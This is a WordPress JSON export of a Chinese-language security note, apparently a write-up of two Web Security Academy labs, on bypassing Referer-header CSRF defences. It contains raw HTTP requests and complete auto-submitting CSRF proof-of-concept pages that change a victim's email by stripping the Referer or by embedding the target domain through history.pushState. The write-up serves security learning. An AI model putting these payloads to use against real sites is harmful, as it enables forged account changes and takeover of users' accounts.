{"id":1297,"date":"2023-02-26T23:28:00","date_gmt":"2023-02-26T15:28:00","guid":{"rendered":"https:\/\/systw.net\/note\/?p=1297"},"modified":"2024-03-16T00:42:37","modified_gmt":"2024-03-15T16:42:37","slug":"csrf-bypass-referer","status":"publish","type":"post","link":"https:\/\/systw.net\/note\/archives\/1297","title":{"rendered":"CSRF bypass referer"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">\u67d0\u4e9b\u61c9\u7528\u7a0b\u5f0f\u4f7f\u7528 HTTP<code>Referer<\/code>\u6a19\u982d\u4f86\u5617\u8a66\u9632\u79a6 CSRF \u653b\u64ca\uff0c\u9019\u7a2e\u65b9\u6cd5\u53ef\u7528\u4ee5\u4e0b\u5e7e\u7a2e\u65b9\u5f0f\u7e5e\u904e\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u5ffd\u7565referer<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u67d0\u4e9b\u61c9\u7528\u7a0b\u5f0f\u6703<code>Referer<\/code>\u5728\u8acb\u6c42\u4e2d\u51fa\u73fe\u6a19\u982d\u6642\u9032\u884c\u9a57\u8b49\uff0c\u4f46\u5982\u679c\u7701\u7565\u6a19\u982d\uff0c\u5247\u6703\u8df3\u904e\u9a57\u8b49\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8209\u4f8b\u5982\u4e0b\uff0c\u6b63\u5e38\u8acb\u6c42\u5305\u542b<code>referer<\/code><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>POST \/email\/change-email HTTP\/1.1\r\nHost: ac811f131f215c5e805c322b00aa00e2.web-security-academy.net\r\n...omit...\r\nReferer: https:\/\/ac811f131f215c5e805c322b00aa00e2.web-security-academy.net\/email\r\n...omit...\r\nemail=test%40gmail.com<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f46\u628a<code>referer<\/code>\u79fb\u9664\u9001\u51fa\u8acb\u6c42\u4e5f\u53ef\u6210\u529f<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>POST \/email\/change-email HTTP\/1.1\nHost: ac811f131f215c5e805c322b00aa00e2.web-security-academy.ne\n...omit...\nemail=test%40gmail.com<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u56e0\u6b64\u53ef\u4ee5\u6e96\u5099\u653b\u64ca\u9801\u9762\u5982\u4e0b\uff0c\u4e26\u8981\u6c42\u4e0d\u8981\u50b3\u9001<code>Referer<\/code><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">&lt;meta name=\"referrer\" content=\"no-referrer\"><\/mark>\r\n&lt;html>\r\n  &lt;!-- CSRF PoC - generated by Burp Suite Professional -->\r\n  &lt;body>\r\n  &lt;script>history.pushState('', '', '\/')&lt;\/script>\r\n    &lt;form action=\"https:\/\/ac811f131f215c5e805c322b00aa00e2.web-security-academy.net\/email\/change-email\" method=\"POST\">\r\n      &lt;input type=\"hidden\" name=\"email\" value=\"test1&amp;#64;gmail&amp;#46;com\" \/>\r\n      &lt;input type=\"submit\" value=\"Submit request\" \/>\r\n    &lt;\/form>\r\n    &lt;script>\r\n      document.forms&#91;0].submit();\r\n    &lt;\/script>\r\n  &lt;\/body>\r\n&lt;\/html><\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Lab: CSRF where Referer validation depends on header being present<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">referer\u589e\u52a0\u5408\u6cd5\u5b57\u4e32<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u61c9\u7528\u7a0b\u5f0f\u9a57\u8b49<code>Referer<\/code>\u4e2d\u7684\u7db2\u57df\u4ee5\u9810\u671f\u503c\u958b\u982d\uff0c\u6216\u662f\u53ea\u9a57\u8b49\u5305\u542b<code>Referer<\/code>\u81ea\u5df1\u7684\u57df\u540d\uff0c\u5247\u53ef\u7e5e\u904e\u9a57\u8b49 <\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8209\u4f8b\u5982\u4e0b\uff0c\u6b63\u5e38\u8acb\u6c42\u5305\u542breferer<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>POST \/email\/change-email HTTP\/1.1\nHost: ac811f131f215c5e805c322b00aa00e2.web-security-academy.net\n...omit...\nReferer: https:\/\/ac811f131f215c5e805c322b00aa00e2.web-security-academy.net\/email\n...omit...\nemail=test%40gmail.com<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f46\u5728referer\u589e\u52a0\u76ee\u6a19\u7db2\u7ad9\u7684\u7db2\u5740\uff0c\u5373\u4fbf\u4f86\u6e90\u662f\u653b\u64ca\u7db2\u5740\uff0c\u9001\u51fa\u8acb\u6c42\u4e5f\u53ef\u6210\u529f<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>POST \/email\/change-email HTTP\/1.1\r\nHost: ac2a1f501fd76830801f025a009900b0.web-security-academy.net\r\n...omit...\r\nReferer: https:\/\/hackerwebsite.com?<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">ac2a1f501fd76830801f025a009900b0.web-security-academy.net<\/mark>\r\n...omit...\r\nemail=test%40gmail.com<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u56e0\u6b64\u53ef\u4ee5\u6e96\u5099\u653b\u64ca\u9801\u9762\u5982\u4e0b\uff0c\u900f\u904ehistory.pushState()\u8b93\u8acb\u6c42\u7684<code>Referer<\/code>\u5305\u542b\u76ee\u6a19\u7db2\u7ad9\u7684\u7db2\u5740<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;html>\r\n  &lt;!-- CSRF PoC - generated by Burp Suite Professional -->\r\n  &lt;body>\r\n    &lt;script>history.pushState('', '', '\/?<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">ac2a1f501fd76830801f025a009900b0.web-security-academy.net<\/mark>')&lt;\/script>\r\n    &lt;form action=\"https:\/\/ac2a1f501fd76830801f025a009900b0.web-security-academy.net\/email\/change-email\" method=\"POST\">\r\n      &lt;input type=\"hidden\" name=\"email\" value=\"test&amp;#64;gmail&amp;#46;com\" \/>\r\n    &lt;\/form>\r\n    &lt;script>\r\n      document.forms&#91;0].submit();\r\n    &lt;\/script>\r\n  &lt;\/body>\r\n&lt;\/html><\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u5728\u6e2c\u8a66\u6642\u51fa\u73fe<code>invalid Referer header<\/code>\uff0c\u53ef\u4ee5\u5728\u4e0a\u8ff0\u653b\u64ca\u9801\u9762\u7684head\u5340\u57df\u589e\u52a0<code>referrer-Policy: unsafe-url<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u7576\u53d7\u5bb3\u8005\u8a2a\u554f\u653b\u64ca\u9801\u9762\u6642\uff0c\u6703\u8fd4\u56de\u4ee5\u4e0b\u5167\u5bb9<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>################# request #################\nGET \/exploit HTTP\/1.1\r\nHost: exploit-0aa3002e04d4b848803fd94f01030044.exploit-server.net\n\n################# response #################\nHTTP\/2 200 OK\r\nContent-Type: text\/html; charset=utf-8\r\n<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">Referrer-Policy: unsafe-url<\/mark>\r\nServer: Academy Exploit Server\r\nContent-Length: 479\r\n\r\n&lt;html>\r\n  &lt;!-- CSRF PoC - generated by Burp Suite Professional -->\r\n  &lt;body>\r\n...omit...<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u653b\u64ca\u9801\u9762\u6307\u4ee4\u6703\u8981\u6c42\u700f\u89bd\u5668\u6703\u767c\u9001\u4ee5\u4e0b\u8acb\u6c42\uff0c\u8b93<code>Referer<\/code>\u5f8c\u9762\u5728\u53e6\u5916\u9644\u4e0a\u6307\u5b9a\u7684\u7db2\u5740<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>POST \/email\/change-email HTTP\/1.1\r\nHost: ac2a1f501fd76830801f025a009900b0.web-security-academy.net\r\n\r...omit...\nReferer: https:\/\/exploit-0aa3002e04d4b848803fd94f01030044.exploit-server.net\/?<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">ac2a1f501fd76830801f025a009900b0<\/mark>.web-security-academy.net\r\n\r\nemail=test%40gmail.com<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u7531\u65bc<code>Referer<\/code>\u5167\u6709\u5305\u542b\u76ee\u6a19\u7db2\u7ad9\u7db2\u5740\uff0c\u6709\u7b26\u5408\u9a57\u8b49\u898f\u5247\uff0c\u56e0\u6b64\u53ef\u6210\u529f\u9952\u904e<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Lab: CSRF with broken Referer validation<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u67d0\u4e9b\u61c9\u7528\u7a0b\u5f0f\u4f7f\u7528 HTTPReferer\u6a19\u982d\u4f86\u5617\u8a66\u9632\u79a6 CS &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[40],"tags":[42],"class_list":["post-1297","post","type-post","status-publish","format-standard","hentry","category-clientside","tag-bypass"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":1295,"url":"https:\/\/systw.net\/note\/archives\/1295","url_meta":{"origin":1297,"position":0},"title":"CSRF bypass Token","author":"raymond","date":"2023 \u5e74 2 \u6708 25 \u65e5","format":false,"excerpt":"CSRF Token\u662f\u7531\u4f3a\u670d\u5668\u7aef\u61c9\u7528\u7a0b\u5f0f\u7522\u751f\u4e26\u8207\u5ba2\u6236\u7aef\u5171\u7528\u7684\u552f\u4e00\u3001\u79d8\u5bc6\u4e14\u4e0d\u53ef\u9810\u6e2c\u7684\u503c\u3002\u7576\u767c\u51fa\u57f7\u884c\u654f\u611f\u2026","rel":"","context":"\u5728\u300cClientSide\u300d\u4e2d","block_context":{"text":"ClientSide","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/clientside"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1308,"url":"https:\/\/systw.net\/note\/archives\/1308","url_meta":{"origin":1297,"position":1},"title":"Bypass Access Control","author":"raymond","date":"2023 \u5e74 3 \u6708 11 \u65e5","format":false,"excerpt":"\u5b58\u53d6\u63a7\u5236\u5e38\u898b\u7684\u9952\u904e\u6a5f\u5236\u6709 \u4f7f\u7528\u8acb\u6c42\u982d\u9952\u904e\u5b58\u53d6\u9650\u5236 \u4f7f\u7528\u4e0d\u540c\u8acb\u6c42\u65b9\u6cd5\u9952\u904e\u5b58\u53d6\u9650\u5236 \u4fee\u6539refer\u9952\u904e\u5b58\u2026","rel":"","context":"\u5728\u300cLogic Vulnerabilities\u300d\u4e2d","block_context":{"text":"Logic Vulnerabilities","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/logic-vulnerabilities"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1224,"url":"https:\/\/systw.net\/note\/archives\/1224","url_meta":{"origin":1297,"position":2},"title":"SSRF defense bypass","author":"raymond","date":"2023 \u5e74 2 \u6708 9 \u65e5","format":false,"excerpt":"SSRF\u653b\u64ca\u7684\u9632\u79a6\u63aa\u65bd\u5f88\u5e38\u898b\uff0c\u4f46\u5927\u90e8\u4efd\u53ef\u4ee5\u9952\u904e \u7576\u5b89\u5168\u9650\u5236\u5c01\u9396127.0.0.1\u6216localhost\u2026","rel":"","context":"\u5728\u300cServerSide\u300d\u4e2d","block_context":{"text":"ServerSide","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/serverside"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1465,"url":"https:\/\/systw.net\/note\/archives\/1465","url_meta":{"origin":1297,"position":3},"title":"OAuth Client Application\u00a0","author":"raymond","date":"2023 \u5e74 3 \u6708 27 \u65e5","format":false,"excerpt":"OAuth\u898f\u7bc4\u7684\u5b9a\u7fa9\u76f8\u5c0d\u5bec\u9b06\uff0c\u6bcf\u7a2e\u6388\u6b0a\u985e\u578b\u90fd\u6709\u8a31\u591a\u53ef\u9078\u53c3\u6578\u548c\u914d\u7f6e\u8a2d\u7f6e\uff0c\u9019\u610f\u5473\u8457\u932f\u8aa4\u914d\u7f6e\u7684\u7bc4\u570d\u5f88\u5927\u3002\u56e0\u2026","rel":"","context":"\u5728\u300cLogic Vulnerabilities\u300d\u4e2d","block_context":{"text":"Logic Vulnerabilities","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/logic-vulnerabilities"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1179,"url":"https:\/\/systw.net\/note\/archives\/1179","url_meta":{"origin":1297,"position":4},"title":"Request Smuggling Attack","author":"raymond","date":"2023 \u5e74 2 \u6708 6 \u65e5","format":false,"excerpt":"\u95dc\u65bc\u8acb\u6c42\u8d70\u79c1\u7684\u4ecb\u7d39\u53ef\u53c3\u8003 https:\/\/systw.net\/note\/archives\/1172 \u2026","rel":"","context":"\u5728\u300cOperations\u300d\u4e2d","block_context":{"text":"Operations","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/operations"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1284,"url":"https:\/\/systw.net\/note\/archives\/1284","url_meta":{"origin":1297,"position":5},"title":"CSRF bypass SameSite Lax","author":"raymond","date":"2023 \u5e74 2 \u6708 23 \u65e5","format":false,"excerpt":"SameSite\uff1dLax \u8868\u793a\u700f\u89bd\u5668\u53ea\u5728\u4ee5\u4e0b2\u7a2e\u60c5\u6cc1\u624d\u6703\u5728\u8de8\u7db2\u7ad9\u8acb\u6c42\u4e2d\u50b3\u9001 cookie \uff0c\u800c\u4e14\u5927\u90e8\u2026","rel":"","context":"\u5728\u300cClientSide\u300d\u4e2d","block_context":{"text":"ClientSide","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/clientside"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]}],"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1297","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1297"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1297\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1297"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1297"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1297"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}